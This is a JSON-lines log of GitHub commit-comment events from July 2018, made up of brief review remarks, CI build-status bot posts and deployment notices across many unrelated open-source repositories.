{"id":"7971633608","type":"CommitCommentEvent","actor":{"login":"NickPL-X"},"repo":{"name":"NickPL-X/projects"},"payload":{"comment":{"id":29722846,"position":null,"line":null,"path":null,"commit_id":"837ca8915416c4be43a0bd3bb47701439f772386","created_at":"2018-07-16T16:04:17Z","updated_at":"2018-07-16T16:04:17Z","author_association":"OWNER","body":"基于socket的模拟发送http请求的爬虫"}},"created_at":"2018-07-16T16:04:17Z"}
{"id":"7971634469","type":"CommitCommentEvent","actor":{"login":"miguelvr"},"repo":{"name":"mallidi/espnet"},"payload":{"comment":{"id":29722847,"position":14,"line":2163,"path":"src/nets/e2e_asr_attctc_th.py","commit_id":"5ba7cd8f3a0e7049877dae1148cbacd3c7b64009","created_at":"2018-07-16T16:04:25Z","updated_at":"2018-07-16T16:04:25Z","author_association":"NONE","body":"you may also want to change \"blstmp\" to \"lstm\" and \"bgrup\" to \"gru\" to keep it consistent with `cell_type`"}},"created_at":"2018-07-16T16:04:25Z"}
{"id":"7971637500","type":"CommitCommentEvent","actor":{"login":"yourzhao"},"repo":{"name":"yourzhao/springbootdemo"},"payload":{"comment":{"id":29722851,"position":3,"line":3,"path":"src/main/java/ch3/taskscheduler/Main.java","commit_id":"ef7a2536ccf5e677c4d839aac9bdf152224af474","created_at":"2018-07-16T16:04:59Z","updated_at":"2018-07-16T16:04:59Z","author_association":"OWNER","body":"//test"}},"created_at":"2018-07-16T16:04:59Z"}
{"id":"7971640149","type":"CommitCommentEvent","actor":{"login":"YolsaEni"},"repo":{"name":"YolsaEni/LiFind"},"payload":{"comment":{"id":29722856,"position":null,"line":null,"path":null,"commit_id":"7bccf13989cdd8878ca3ecbf2bcd3877cae5fe1f","created_at":"2018-07-16T16:05:27Z","updated_at":"2018-07-16T16:05:27Z","author_association":"OWNER","body":"h"}},"created_at":"2018-07-16T16:05:27Z"}
{"id":"7971641533","type":"CommitCommentEvent","actor":{"login":"Alej0hio"},"repo":{"name":"OpenShopChannel/Open-Shop-SOAP"},"payload":{"comment":{"id":29722858,"position":null,"line":null,"path":null,"commit_id":"1ee66f1aee5e90a92244b0d9e6cb216fec0c8c95","created_at":"2018-07-16T16:05:41Z","updated_at":"2018-07-16T16:05:41Z","author_association":"NONE","body":"🤔 train"}},"created_at":"2018-07-16T16:05:41Z"}
{"id":"7971642027","type":"CommitCommentEvent","actor":{"login":"techgique"},"repo":{"name":"CDRH/orchid"},"payload":{"comment":{"id":29722859,"position":5,"line":50,"path":"app/views/items/_facets.html.erb","commit_id":"ac13ae07a1bd0f216fbc757a61e7756c78ae33ac","created_at":"2018-07-16T16:05:46Z","updated_at":"2018-07-16T16:05:46Z","author_association":"MEMBER","body":"Ah okay. Thanks for the explanation!"}},"created_at":"2018-07-16T16:05:46Z"}
{"id":"7971644505","type":"CommitCommentEvent","actor":{"login":"carlosmmelo"},"repo":{"name":"X9Developers/XSN"},"payload":{"comment":{"id":29722865,"position":5,"line":254,"path":"src/chainparams.cpp","commit_id":"12b998632e0f83b38f3a5accee913d5cddf015ea","created_at":"2018-07-16T16:06:11Z","updated_at":"2018-07-16T16:06:11Z","author_association":"COLLABORATOR","body":"`// July 16 2018 @ 6:00pm (UTC)`"}},"created_at":"2018-07-16T16:06:11Z"}
{"id":"7971645737","type":"CommitCommentEvent","actor":{"login":"jnosornov"},"repo":{"name":"jnosornov/sillyTodoAPI"},"payload":{"comment":{"id":29722868,"position":null,"line":null,"path":null,"commit_id":"dd6534b682377f56764be88be73b8c8a4f24e730","created_at":"2018-07-16T16:06:24Z","updated_at":"2018-07-16T16:06:24Z","author_association":"OWNER","body":"Are validators really useful?. They just validate the basics. Also I do  need to understand how to catch validation errors."}},"created_at":"2018-07-16T16:06:24Z"}
{"id":"7971651691","type":"CommitCommentEvent","actor":{"login":"laf"},"repo":{"name":"librenms/librenms"},"payload":{"comment":{"id":29722875,"position":null,"line":null,"path":null,"commit_id":"ad6ec7f72a7d7326859985a8981b9106259f2d8d","created_at":"2018-07-16T16:07:26Z","updated_at":"2018-07-16T16:07:26Z","author_association":"MEMBER","body":"Running validate.php would show you what to do, changing the ViewServiceProvider::class is not a fix and will lead to failed updates in the future."}},"created_at":"2018-07-16T16:07:26Z"}
{"id":"7971651716","type":"CommitCommentEvent","actor":{"login":"mixsmart"},"repo":{"name":"mixsmart/privacy"},"payload":{"comment":{"id":29722876,"position":null,"line":null,"path":null,"commit_id":"0eab3672957ef12bab7d119bb40700d910093429","created_at":"2018-07-16T16:07:26Z","updated_at":"2018-07-16T16:07:26Z","author_association":"OWNER","body":"refresh info"}},"created_at":"2018-07-16T16:07:26Z"}
{"id":"7971655456","type":"CommitCommentEvent","actor":{"login":"toolboc"},"repo":{"name":"toolboc/faithcoin"},"payload":{"comment":{"id":29722885,"position":null,"line":null,"path":null,"commit_id":"f1cb4e47afe9d2006e9d6cd2be878b9b6d1de86b","created_at":"2018-07-16T16:08:08Z","updated_at":"2018-07-16T16:08:08Z","author_association":"OWNER","body":"The block explorer project required a modified version of the faithCoin client (https://github.com/toolboc/faithcore-faithcoin based on https://github.com/litecoin-project/litecore-litecoin) in addition to a modified version of https://github.com/litecoin-project/insight-lite-ui\r\n\r\nFrom what I recall, we had to create the modified client (the litecore piece) to allow interactions from the block explorer piece (insight-lite-ui).  It is highly likely that this process has changed.  For up to date documentation, you may want to check the original block explorer project @ https://github.com/bitpay/insight"}},"created_at":"2018-07-16T16:08:08Z"}
{"id":"7971657735","type":"CommitCommentEvent","actor":{"login":"americkson"},"repo":{"name":"RAIL-UGA/rail-uga-stellar"},"payload":{"comment":{"id":29722894,"position":null,"line":null,"path":null,"commit_id":"f1a48b69e834e9f41c4973a37e553198c4638a1f","created_at":"2018-07-16T16:08:31Z","updated_at":"2018-07-16T16:08:31Z","author_association":"CONTRIBUTOR","body":"Created multidev environment [rail-uga-stellar#ci-375](https://dashboard.pantheon.io/sites/05f5afa3-c1ec-448f-915a-9234103f2409#ci-375).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-375-rail-uga-stellar.pantheonsite.io/)"}},"created_at":"2018-07-16T16:08:31Z"}
{"id":"7971661697","type":"CommitCommentEvent","actor":{"login":"borisalmonacid"},"repo":{"name":"PDAL/PDAL"},"payload":{"comment":{"id":29722903,"position":null,"line":null,"path":null,"commit_id":"6b381bff8ca42c6ecd237916dc84d44932a79e54","created_at":"2018-07-16T16:09:16Z","updated_at":"2018-07-16T16:09:16Z","author_association":"NONE","body":"used this references (it's the same, but in my computer, I don't have a warning)\r\n\r\n@article{myronenko2010point,\r\n  title={Point set registration: Coherent point drift},\r\n  author={Myronenko, Andriy and Song, Xubo},\r\n  journal={IEEE transactions on pattern analysis and machine intelligence},\r\n  volume={32},\r\n  number={12},\r\n  pages={2262--2275},\r\n  year={2010},\r\n  publisher={IEEE}\r\n}\r\n\r\n@inproceedings{yuille1988motion,\r\n  title={The motion coherence theory},\r\n  author={Yuille, Alan L and Grzywacz, Norberto M},\r\n  booktitle={1988 Second International Conference on Computer Vision},\r\n  pages={344--353},\r\n  year={1988},\r\n  organization={IEEE}\r\n}\r\n\r\n@article{glennie2007rigorous,\r\n  title={Rigorous 3D error analysis of kinematic scanning LIDAR systems},\r\n  author={Glennie, Craig},\r\n  journal={Journal of Applied Geodesy jag},\r\n  volume={1},\r\n  number={3},\r\n  pages={147--157},\r\n  year={2007},\r\n  publisher={Walter de Gruyter}\r\n}\r\n"}},"created_at":"2018-07-16T16:09:16Z"}
{"id":"7971664608","type":"CommitCommentEvent","actor":{"login":"dhtdht020"},"repo":{"name":"OpenShopChannel/Open-Shop-SOAP"},"payload":{"comment":{"id":29722908,"position":null,"line":null,"path":null,"commit_id":"1ee66f1aee5e90a92244b0d9e6cb216fec0c8c95","created_at":"2018-07-16T16:09:50Z","updated_at":"2018-07-16T16:09:50Z","author_association":"CONTRIBUTOR","body":":thinking: train"}},"created_at":"2018-07-16T16:09:50Z"}
{"id":"7971666737","type":"CommitCommentEvent","actor":{"login":"majcram"},"repo":{"name":"majcram/swot"},"payload":{"comment":{"id":29722911,"position":null,"line":null,"path":null,"commit_id":"1878a14de7dab202b90f16f1cc353d54b78178fa","created_at":"2018-07-16T16:10:14Z","updated_at":"2018-07-16T16:10:14Z","author_association":"OWNER","body":"https://www.waketech.edu/\r\nhttps://www.waketech.edu/programs-courses/credit/computer-technologies/computer-programming/degrees-programs/a25590cp\r\n[Screenshot 2018-07-16 10.07.44.pdf](https://github.com/majcram/swot/files/2198374/Screenshot.2018-07-16.10.07.44.pdf)\r\n![screenshot 2018-07-16 10 09 41](https://user-images.githubusercontent.com/13928465/42769727-0ea072de-88f1-11e8-8ac1-0de437388f08.png)\r\n"}},"created_at":"2018-07-16T16:10:14Z"}
{"id":"7971667988","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29722913,"position":null,"line":null,"path":null,"commit_id":"2faef250227e996895aacca5fa62e90d17602a7a","created_at":"2018-07-16T16:10:26Z","updated_at":"2018-07-16T16:10:26Z","author_association":"NONE","body":"#6517-MissingEqNumRefsInEngrgRef (Myoldmopar) - Win64-Windows-7-VisualStudio-14: OK (2319 of 2319 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-2faef250227e996895aacca5fa62e90d17602a7a-Win64-Windows-7-VisualStudio-14.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-2faef250227e996895aacca5fa62e90d17602a7a-Win64-Windows-7-VisualStudio-14.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> \n"}},"created_at":"2018-07-16T16:10:26Z"}
{"id":"7971669828","type":"CommitCommentEvent","actor":{"login":"mbtuchman"},"repo":{"name":"TheRedditMirrorBot/mirrorbot"},"payload":{"comment":{"id":29722918,"position":null,"line":null,"path":null,"commit_id":"2d9c738ee56d1877dcbbd461e15b996eb17cd29a","created_at":"2018-07-16T16:10:46Z","updated_at":"2018-07-16T16:10:46Z","author_association":"CONTRIBUTOR","body":"The changes are visible [here](https://github.com/TheRedditMirrorBot/mirrorbot/issues/new)"}},"created_at":"2018-07-16T16:10:46Z"}
{"id":"7971675959","type":"CommitCommentEvent","actor":{"login":"mtarifaagro"},"repo":{"name":"mtarifaagro/almeriacultiva"},"payload":{"comment":{"id":29722927,"position":null,"line":null,"path":null,"commit_id":"c354457e5f0b9e5cc930ce85e8a7411e49106cde","created_at":"2018-07-16T16:11:52Z","updated_at":"2018-07-16T16:11:52Z","author_association":"OWNER","body":"cambios"}},"created_at":"2018-07-16T16:11:52Z"}
{"id":"7971676015","type":"CommitCommentEvent","actor":{"login":"MayadaSaleh"},"repo":{"name":"MayadaSaleh/Problem-Solving-Practice"},"payload":{"comment":{"id":29722928,"position":23,"line":23,"path":"src/leetcode/TopFrequentElements.java","commit_id":"7aa53894f2674e6498ce33ddb7728627c1dadfc6","created_at":"2018-07-16T16:11:53Z","updated_at":"2018-07-16T16:11:53Z","author_association":"OWNER","body":"OK"}},"created_at":"2018-07-16T16:11:53Z"}
{"id":"7971678670","type":"CommitCommentEvent","actor":{"login":"godo13405"},"repo":{"name":"godo13405/dragon-spellbook"},"payload":{"comment":{"id":29722933,"position":null,"line":null,"path":null,"commit_id":"b683b61a3bc8d18a9d691c0168bf896da899ec1a","created_at":"2018-07-16T16:12:22Z","updated_at":"2018-07-16T16:12:22Z","author_association":"OWNER","body":"IBM Cloud [toolchain](https://console.bluemix.net/devops/toolchains/48c4c854-767b-47f7-b2ec-7f79e14cf35d?env_id=ibm%3Ayp%3Aeu-gb \"dragon-book\"): [Delivery Pipeline](https://console.bluemix.net/devops/pipelines/7ddab936-a781-49fa-99fc-742d790aea96?env_id=ibm%3Ayp%3Aeu-gb \"dragon-book\") deployed [dragon-spellbook](https://github.com/godo13405/dragon-spellbook/releases/tag/deploy-ibm-yp-eu-gb-UXCalibur-prod-20180716-161221 \"deploy-ibm-yp-eu-gb-UXCalibur-prod-20180716-161221\") to [prod](https://console.bluemix.net/apps/aaffb021-5482-4ff5-bc14-26c90db6686c?env_id=ibm:yp:eu-gb \"ibm:yp:eu-gb:UXCalibur:prod\"), including this commit"}},"created_at":"2018-07-16T16:12:22Z"}
{"id":"7971681805","type":"CommitCommentEvent","actor":{"login":"Sija"},"repo":{"name":"getkirby/panel"},"payload":{"comment":{"id":29722940,"position":32,"line":81,"path":"app/src/panel/models/user.php","commit_id":"f0d9ea607744bf11a9156ed38e6ede14b4911fa3","created_at":"2018-07-16T16:12:55Z","updated_at":"2018-07-16T16:12:55Z","author_association":"NONE","body":"Seriously?!"}},"created_at":"2018-07-16T16:12:55Z"}
{"id":"7971686183","type":"CommitCommentEvent","actor":{"login":"nikon-petr"},"repo":{"name":"FokinAlex/SpringSimpleApp"},"payload":{"comment":{"id":29722950,"position":55,"line":55,"path":"src/main/resources/schema.sql","commit_id":"b327a84ee45bf46e25ec8cf7673f1756176c6e45","created_at":"2018-07-16T16:13:44Z","updated_at":"2018-07-16T16:13:44Z","author_association":"NONE","body":"IMHO separate file for DML looks clearer"}},"created_at":"2018-07-16T16:13:44Z"}
{"id":"7971687596","type":"CommitCommentEvent","actor":{"login":"Alej0hio"},"repo":{"name":"OpenShopChannel/Open-Shop-SOAP"},"payload":{"comment":{"id":29722953,"position":null,"line":null,"path":null,"commit_id":"1ee66f1aee5e90a92244b0d9e6cb216fec0c8c95","created_at":"2018-07-16T16:13:59Z","updated_at":"2018-07-16T16:13:59Z","author_association":"NONE","body":":face_palm:\r\n"}},"created_at":"2018-07-16T16:13:59Z"}
{"id":"7971688104","type":"CommitCommentEvent","actor":{"login":"TommyClausner"},"repo":{"name":"agramfort/mne-python"},"payload":{"comment":{"id":29722956,"position":103,"line":294,"path":"mne/morph.py","commit_id":"ed3f15735d7966010356e568fc3691788b81a660","created_at":"2018-07-16T16:14:05Z","updated_at":"2018-07-16T16:14:05Z","author_association":"NONE","body":"I couldn't really find it: what would be it's default place?"}},"created_at":"2018-07-16T16:14:05Z"}
{"id":"7971688569","type":"CommitCommentEvent","actor":{"login":"aledjones"},"repo":{"name":"aledjones/db-rest"},"payload":{"comment":{"id":29722958,"position":17,"line":32,"path":"readme.md","commit_id":"5d445e9a4e96c8773a83ce3e5e2feb3be580fee9","created_at":"2018-07-16T16:14:10Z","updated_at":"2018-07-16T16:14:10Z","author_association":"OWNER","body":"The custom tagging I did in _this_ repo was actually just to toy around with the node versions, as all versions from 6-10 run the software anyway. But there are some differences in performance between the versions when it comes to scaling the application. It's ultimately the users choice which version he likes to run and fits his resources the best.\r\n\r\nWhat really brought me to using a different base image was the size of the original node package. It’s about 1.5GB in size when build, which is just too much fur such a small project. \r\nSo I cloned the repo, tried different combinations in testing and the most efficient options turned out to be the base images `node:alpine` and `node-slim`.\r\n\r\nTags allows the application to address „I just need to run this no matter the size“ and „I have limited resources and tag **x** suites my needs“ scenarios, both in one single Docker image.\r\n\r\nWhen I think about it, i should just have opened a PR on the repo with an updated version of the Dockerfile. 😄 "}},"created_at":"2018-07-16T16:14:10Z"}
{"id":"7971689021","type":"CommitCommentEvent","actor":{"login":"dhtdht020"},"repo":{"name":"OpenShopChannel/Open-Shop-SOAP"},"payload":{"comment":{"id":29722960,"position":null,"line":null,"path":null,"commit_id":"1ee66f1aee5e90a92244b0d9e6cb216fec0c8c95","created_at":"2018-07-16T16:14:13Z","updated_at":"2018-07-16T16:14:13Z","author_association":"CONTRIBUTOR","body":":face_palm:"}},"created_at":"2018-07-16T16:14:13Z"}
{"id":"7971689224","type":"CommitCommentEvent","actor":{"login":"tomtomjhj"},"repo":{"name":"runtimeverification/verified-smart-contracts"},"payload":{"comment":{"id":29722961,"position":17,"line":53,"path":"gnosis/verification.k","commit_id":"07573654d15ddfff68613cfab45309722b0689e3","created_at":"2018-07-16T16:14:15Z","updated_at":"2018-07-16T16:14:15Z","author_association":"MEMBER","body":"0x11..1100..00 -> 0xff..ff00..00"}},"created_at":"2018-07-16T16:14:15Z"}
{"id":"7971698270","type":"CommitCommentEvent","actor":{"login":"edunov"},"repo":{"name":"rivulet-zhang/fairseq"},"payload":{"comment":{"id":29722989,"position":76,"line":107,"path":"fairseq/tokenizer.py","commit_id":"f7ac57c5eb8dd13b466b5f202e6cdbebc9a0b55f","created_at":"2018-07-16T16:15:54Z","updated_at":"2018-07-16T16:15:54Z","author_association":"NONE","body":"I haven't tested, but isn't this loop always taking 100% CPU? Why don't you use blocking ids_queue.get() instead? "}},"created_at":"2018-07-16T16:15:54Z"}
{"id":"7971707474","type":"CommitCommentEvent","actor":{"login":"furqanbaqai"},"repo":{"name":"furqanbaqai/Remittance"},"payload":{"comment":{"id":29723002,"position":128,"line":88,"path":"contracts/Remittance.sol","commit_id":"a2dfdb2598dbdf1a19f54c4584ea38bc9300d3f5","created_at":"2018-07-16T16:17:35Z","updated_at":"2018-07-16T16:17:35Z","author_association":"OWNER","body":"Fixed the issue. I think issue was in condition `require(transactions[transKey].expiresOn >= expiresOn` changed it to `require(transactions[transKey].expiresOn > expiresOn,\"[ER210] Transaction expired\");`"}},"created_at":"2018-07-16T16:17:35Z"}
{"id":"7971711397","type":"CommitCommentEvent","actor":{"login":"aledjones"},"repo":{"name":"aledjones/db-rest"},"payload":{"comment":{"id":29723012,"position":17,"line":32,"path":"readme.md","commit_id":"5d445e9a4e96c8773a83ce3e5e2feb3be580fee9","created_at":"2018-07-16T16:18:19Z","updated_at":"2018-07-16T16:18:19Z","author_association":"OWNER","body":"This repo was created to fit my needs in the first place, I just decided to make it public as there may or may not be users who could benefit from a continuously updated Docker image.\r\n\r\nI myself host a small endpoint with about 10 instances of db-rest in the background for load balancing. Docker was the easiest way to do this setup."}},"created_at":"2018-07-16T16:18:19Z"}
{"id":"7971712822","type":"CommitCommentEvent","actor":{"login":"GoTo95"},"repo":{"name":"GoTo95/Titanic"},"payload":{"comment":{"id":29723017,"position":null,"line":null,"path":null,"commit_id":"656915c3ebf1ef77d5dd915d7cdd087e325adb86","created_at":"2018-07-16T16:18:35Z","updated_at":"2018-07-16T16:18:35Z","author_association":"OWNER","body":"0.82296"}},"created_at":"2018-07-16T16:18:35Z"}
{"id":"7971715085","type":"CommitCommentEvent","actor":{"login":"greg-1-anderson"},"repo":{"name":"greg-1-anderson/gk-8"},"payload":{"comment":{"id":29723023,"position":null,"line":null,"path":null,"commit_id":"1a82e8cf3c61af9395420bef67311dfa26454e13","created_at":"2018-07-16T16:19:02Z","updated_at":"2018-07-16T16:19:02Z","author_association":"OWNER","body":"Created multidev environment [gk-8#pr-depsupda](https://dashboard.pantheon.io/sites/5cbd78f8-3a96-492a-beb0-f892421708d8#pr-depsupda).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://pr-depsupda-gk-8.pantheonsite.io/)"}},"created_at":"2018-07-16T16:19:02Z"}
{"id":"7971718122","type":"CommitCommentEvent","actor":{"login":"furqanbaqai"},"repo":{"name":"furqanbaqai/Remittance"},"payload":{"comment":{"id":29723026,"position":133,"line":93,"path":"contracts/Remittance.sol","commit_id":"a2dfdb2598dbdf1a19f54c4584ea38bc9300d3f5","created_at":"2018-07-16T16:19:36Z","updated_at":"2018-07-16T16:19:36Z","author_association":"OWNER","body":"Yes. And i am also locking the password so the combination of `otpx` + `payID` + `receiverAddress` is not reused. "}},"created_at":"2018-07-16T16:19:36Z"}
{"id":"7971720222","type":"CommitCommentEvent","actor":{"login":"danewatts"},"repo":{"name":"danewatts/scripts"},"payload":{"comment":{"id":29723030,"position":null,"line":null,"path":null,"commit_id":"174908a0b3e3116c81cc24e41e2bacc9306ea0aa","created_at":"2018-07-16T16:20:00Z","updated_at":"2018-07-16T16:20:00Z","author_association":"OWNER","body":"Fixes #1 "}},"created_at":"2018-07-16T16:20:00Z"}
{"id":"7971721495","type":"CommitCommentEvent","actor":{"login":"Alej0hio"},"repo":{"name":"OpenShopChannel/Open-Shop-SOAP"},"payload":{"comment":{"id":29723034,"position":null,"line":null,"path":null,"commit_id":"1ee66f1aee5e90a92244b0d9e6cb216fec0c8c95","created_at":"2018-07-16T16:20:14Z","updated_at":"2018-07-16T16:20:14Z","author_association":"NONE","body":"bonk.io"}},"created_at":"2018-07-16T16:20:14Z"}
{"id":"7971722118","type":"CommitCommentEvent","actor":{"login":"Alej0hio"},"repo":{"name":"OpenShopChannel/Open-Shop-SOAP"},"payload":{"comment":{"id":29723037,"position":null,"line":null,"path":null,"commit_id":"1ee66f1aee5e90a92244b0d9e6cb216fec0c8c95","created_at":"2018-07-16T16:20:21Z","updated_at":"2018-07-16T16:20:21Z","author_association":"NONE","body":"fight me there"}},"created_at":"2018-07-16T16:20:21Z"}
{"id":"7971723503","type":"CommitCommentEvent","actor":{"login":"htdebeer"},"repo":{"name":"htdebeer/SVG-cards"},"payload":{"comment":{"id":29723038,"position":1,"line":1,"path":"Changelog","commit_id":"6006b7c0c87874e11cd10a205f5e85c4996b6577","created_at":"2018-07-16T16:20:37Z","updated_at":"2018-07-16T16:20:37Z","author_association":"OWNER","body":"My id is \"[htdebeer](https://www.npmjs.com/~htdebeer)\"."}},"created_at":"2018-07-16T16:20:37Z"}
{"id":"7971726439","type":"CommitCommentEvent","actor":{"login":"Skidragon"},"repo":{"name":"Skidragon/front-end-project-week"},"payload":{"comment":{"id":29723045,"position":null,"line":null,"path":null,"commit_id":"5936e61b3f903d99d45ae28d282c1c9ef7706a74","created_at":"2018-07-16T16:21:10Z","updated_at":"2018-07-16T16:21:10Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Setup the starting packages, files, and folders for the project](https://trello.com/c/jbClWij6/3-setup-the-starting-packages-files-and-folders-for-the-project)"}},"created_at":"2018-07-16T16:21:10Z"}
{"id":"7971727033","type":"CommitCommentEvent","actor":{"login":"Skidragon"},"repo":{"name":"Skidragon/front-end-project-week"},"payload":{"comment":{"id":29723049,"position":null,"line":null,"path":null,"commit_id":"becae489b2dcfc678bbbf6531b6096a98207b46d","created_at":"2018-07-16T16:21:16Z","updated_at":"2018-07-16T16:21:16Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Setup the starting packages, files, and folders for the project](https://trello.com/c/jbClWij6/3-setup-the-starting-packages-files-and-folders-for-the-project)"}},"created_at":"2018-07-16T16:21:16Z"}
{"id":"7971727209","type":"CommitCommentEvent","actor":{"login":"furqanbaqai"},"repo":{"name":"furqanbaqai/Remittance"},"payload":{"comment":{"id":29723051,"position":150,"line":108,"path":"contracts/Remittance.sol","commit_id":"a2dfdb2598dbdf1a19f54c4584ea38bc9300d3f5","created_at":"2018-07-16T16:21:18Z","updated_at":"2018-07-16T16:21:18Z","author_association":"OWNER","body":"i think what i can do is to add address of the contract as one of the hash argument like `keccak256(abi.encodePacked(this,receiver,otp1, otp2, payID)); `  Adding it in new change and pushing it.\r\n"}},"created_at":"2018-07-16T16:21:18Z"}
{"id":"7971727234","type":"CommitCommentEvent","actor":{"login":"Skidragon"},"repo":{"name":"Skidragon/front-end-project-week"},"payload":{"comment":{"id":29723052,"position":null,"line":null,"path":null,"commit_id":"7bd582ecf2f95ccf36cf7779c64373949df8c7f4","created_at":"2018-07-16T16:21:18Z","updated_at":"2018-07-16T16:21:18Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Setup the starting packages, files, and folders for the project](https://trello.com/c/jbClWij6/3-setup-the-starting-packages-files-and-folders-for-the-project)"}},"created_at":"2018-07-16T16:21:18Z"}
{"id":"7971727712","type":"CommitCommentEvent","actor":{"login":"Skidragon"},"repo":{"name":"Skidragon/front-end-project-week"},"payload":{"comment":{"id":29723053,"position":null,"line":null,"path":null,"commit_id":"481c167db1aabcb64f2eccc0d2c70579631b8265","created_at":"2018-07-16T16:21:23Z","updated_at":"2018-07-16T16:21:23Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Setup the starting packages, files, and folders for the project](https://trello.com/c/jbClWij6/3-setup-the-starting-packages-files-and-folders-for-the-project)"}},"created_at":"2018-07-16T16:21:23Z"}
{"id":"7971729254","type":"CommitCommentEvent","actor":{"login":"craigsapp"},"repo":{"name":"rism-ch/verovio"},"payload":{"comment":{"id":29723056,"position":null,"line":null,"path":null,"commit_id":"a85146ddd6167e60427fc271a3330b411c32ec60","created_at":"2018-07-16T16:21:41Z","updated_at":"2018-07-16T16:21:41Z","author_association":"CONTRIBUTOR","body":"These variables are not longer needed at the staff level.  The style change is currently only controlled at the system level."}},"created_at":"2018-07-16T16:21:41Z"}
{"id":"7971731164","type":"CommitCommentEvent","actor":{"login":"rjbain"},"repo":{"name":"rjbain/dgreat"},"payload":{"comment":{"id":29723063,"position":null,"line":null,"path":null,"commit_id":"14751016dda2fee7a154d5a2502a754009fd7d85","created_at":"2018-07-16T16:22:03Z","updated_at":"2018-07-16T16:22:03Z","author_association":"OWNER","body":"Created multidev environment [dgreat#pr-215](https://dashboard.pantheon.io/sites/41cad7fe-472d-43a9-a470-d391b9622376#pr-215).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://pr-215-dgreat.pantheonsite.io/)"}},"created_at":"2018-07-16T16:22:03Z"}
{"id":"7971734762","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29723067,"position":null,"line":null,"path":null,"commit_id":"2faef250227e996895aacca5fa62e90d17602a7a","created_at":"2018-07-16T16:22:45Z","updated_at":"2018-07-16T16:22:45Z","author_association":"NONE","body":"#6517-MissingEqNumRefsInEngrgRef (Myoldmopar) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug: OK (1694 of 1694 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-2faef250227e996895aacca5fa62e90d17602a7a-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-2faef250227e996895aacca5fa62e90d17602a7a-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-2faef250227e996895aacca5fa62e90d17602a7a-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-40.03%25-green.png)</a>\n"}},"created_at":"2018-07-16T16:22:45Z"}
{"id":"7971737603","type":"CommitCommentEvent","actor":{"login":"AnswerKAS"},"repo":{"name":"AnswerKAS/basictamplate"},"payload":{"comment":{"id":29723069,"position":null,"line":null,"path":null,"commit_id":"031b0f19ac1d2ec32ef993053c2b9d92d58cf4e0","created_at":"2018-07-16T16:23:17Z","updated_at":"2018-07-16T16:23:17Z","author_association":"OWNER","body":"3"}},"created_at":"2018-07-16T16:23:17Z"}
{"id":"7971738094","type":"CommitCommentEvent","actor":{"login":"furqanbaqai"},"repo":{"name":"furqanbaqai/Remittance"},"payload":{"comment":{"id":29723070,"position":31,"line":26,"path":"test/Remittance.js","commit_id":"a2dfdb2598dbdf1a19f54c4584ea38bc9300d3f5","created_at":"2018-07-16T16:23:23Z","updated_at":"2018-07-16T16:23:23Z","author_association":"OWNER","body":"The idea behind was not to sequence, but to try to create a co-relation with documented test cases so that as a practice, deployement team can see relevant document and co-relate it or alternately report the test case number which is failing as well."}},"created_at":"2018-07-16T16:23:23Z"}
{"id":"7971738190","type":"CommitCommentEvent","actor":{"login":"solardiz"},"repo":{"name":"pooler/cpuminer"},"payload":{"comment":{"id":29723072,"position":null,"line":null,"path":null,"commit_id":"aa071501587e34122fbaed76bb4c81c131540338","created_at":"2018-07-16T16:23:24Z","updated_at":"2018-07-16T16:23:24Z","author_association":"NONE","body":"The change on line 608 here actually fixes a use-after-free, which was a much worse issue than a memory leak. Maybe this should be documented in NEWS for 2.4.4 in the current tree (2.5.0+) - better late than never? (Just spent some time troubleshooting this on an older fork of cpuminer. Proper documentation of this fix would have saved me time.)"}},"created_at":"2018-07-16T16:23:24Z"}
{"id":"7971747505","type":"CommitCommentEvent","actor":{"login":"opntr-auto"},"repo":{"name":"HardenedBSD/hardenedBSD"},"payload":{"comment":{"id":29723089,"position":null,"line":null,"path":null,"commit_id":"ef3f402b239860e360fd8a21e7ffaa0e402c59af","created_at":"2018-07-16T16:25:13Z","updated_at":"2018-07-16T16:25:13Z","author_association":"NONE","body":"WIP\nOn Monday, July 16, 2018, Shawn Webb <notifications@github.com> wrote:\n\n> This commit broke buildworld.\n>\n> —\n> You are receiving this because you are subscribed to this thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/HardenedBSD/hardenedBSD/commit/ef3f402b239860e360fd8a21e7ffaa0e402c59af#commitcomment-29722777>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AILQ0ccpnZGW3GzC13PJSTEOXoBnnzkJks5uHLhQgaJpZM4VRY3W>\n> .\n>\n"}},"created_at":"2018-07-16T16:25:13Z"}
